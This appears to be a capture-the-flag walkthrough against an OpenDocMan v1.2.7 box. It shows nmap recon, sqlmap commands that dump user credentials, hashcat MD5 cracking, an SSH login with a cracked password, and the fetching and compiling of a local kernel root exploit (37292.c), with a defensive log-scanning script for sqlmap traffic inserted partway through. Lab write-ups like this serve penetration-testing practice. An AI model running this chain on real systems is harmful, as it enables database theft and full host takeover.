• netdiscover
  • Nmap
  • Wfuzz
  • Nikto
  • sqlmap
  • hash-identifier


Use netdiscover to detect the target IP address.

netdiscover -i eth0 -r is the target.

Then run nmap to detect open ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Ports 22, 80 and 6667 are open.

Use wfuzz to scan. Nothing interesting.

Use Nikto to scan. Same result.

Check the webpage; one link looks like it may be useful.

Double click it.

Examine the links. In Document, I found this:

Looks like path /jabcd0cs/ is available.

Go to it; I found the app is OpenDocMan v1.2.7.

searchsploit opendocman

Got the exploit. Try the SQL injection vulnerability:

sqlmap -u "" --level=5 --risk=3

Now I know the database type is MySQL.

Next, try to dump all table names:

sqlmap -u "" --tables --dbms=mysql

Looks like odm_user is the table I want to take a look at.

Now dump the columns from table odm_user:

sqlmap -u "" -T odm_user --columns --dbms=mysql

Looks like username and password are the interesting columns.

Now time to dump all content from the username and password columns:

sqlmap -u "" -C username,password --dump --dbms=mysql
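From the defender's side, the enumeration above is noisy in the web server's access log. The following is an added example, not part of the original walkthrough: it parses Apache combined-format log lines, flags requests carrying the default sqlmap User-Agent or common injection payload fragments, and groups them by client IP. The log lines, the script name index.php and the id parameter are constructed placeholders (the page does not give the real injection URL).

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache "combined" format: ip ident user [ts] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Fragments typical of automated UNION / boolean / time-based injection probing.
SQLI_MARKERS = ("union select", "information_schema", " and 1=1", " or 1=1",
                "sleep(", "benchmark(", "@@version")

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def sqli_reasons(entry):
    """Return the reasons one request looks like SQL injection probing (empty if none)."""
    reasons = []
    # Assumption: sqlmap sends "sqlmap/<version> (...)" unless --random-agent/--user-agent is set.
    if entry["ua"].lower().startswith("sqlmap/"):
        reasons.append("sqlmap user-agent")
    decoded = unquote_plus(entry["path"]).lower()  # undo %20 etc. before matching
    reasons.extend(f"payload marker {m!r}" for m in SQLI_MARKERS if m in decoded)
    return reasons

def scan(lines, threshold=3):
    """Group suspicious requests by client IP; report IPs with at least `threshold` hits."""
    hits = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # malformed line, skip rather than crash the scan
        reasons = sqli_reasons(entry)
        if reasons:
            hits[entry["ip"]].append((entry["path"], reasons))
    return {ip: h for ip, h in hits.items() if len(h) >= threshold}

# Constructed sample log (not real captures); only /jabcd0cs/ comes from the page.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /jabcd0cs/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2020:10:00:01 +0000] "GET /jabcd0cs/index.php?id=1%20AND%201=1 HTTP/1.1" 200 90 "-" "sqlmap/1.4 (http://sqlmap.org)"',
    '10.0.0.9 - - [01/Jan/2020:10:00:02 +0000] "GET /jabcd0cs/index.php?id=1%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables HTTP/1.1" 200 90 "-" "sqlmap/1.4 (http://sqlmap.org)"',
    '10.0.0.9 - - [01/Jan/2020:10:00:03 +0000] "GET /jabcd0cs/index.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 90 "-" "sqlmap/1.4 (http://sqlmap.org)"',
    '10.0.0.7 - - [01/Jan/2020:10:00:04 +0000] "GET /jabcd0cs/index.php?id=1%27%20OR%201=1 HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, requests in scan(SAMPLE_LOG).items():
        print(ip, len(requests), "suspicious requests")
```

The User-Agent check is the cheapest signal but trivially evaded, so the payload markers and per-IP volume carry the real weight; tune `threshold` to the site's normal traffic.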

Use hash-identifier to detect the hash type.

looks like they are MD5.

Use hashcat to crack them:

hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Only guest's password is cracked.

Find a very good website to crack MD5 online, get the cracked password webmin1980 for user webmin, and log in:

Not very helpful.

Try to SSH to the box as webmin.

Get a proper bash TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

First, check the OS version:

uname -a

searchsploit 3.13.0

Try this exploit.

In Kali:

cp /usr/share/exploitdb/platforms/linux/local/37292.c /var/www/html/.
service apache2 restart

On the target:

wget .
gcc 37292.c -o 37292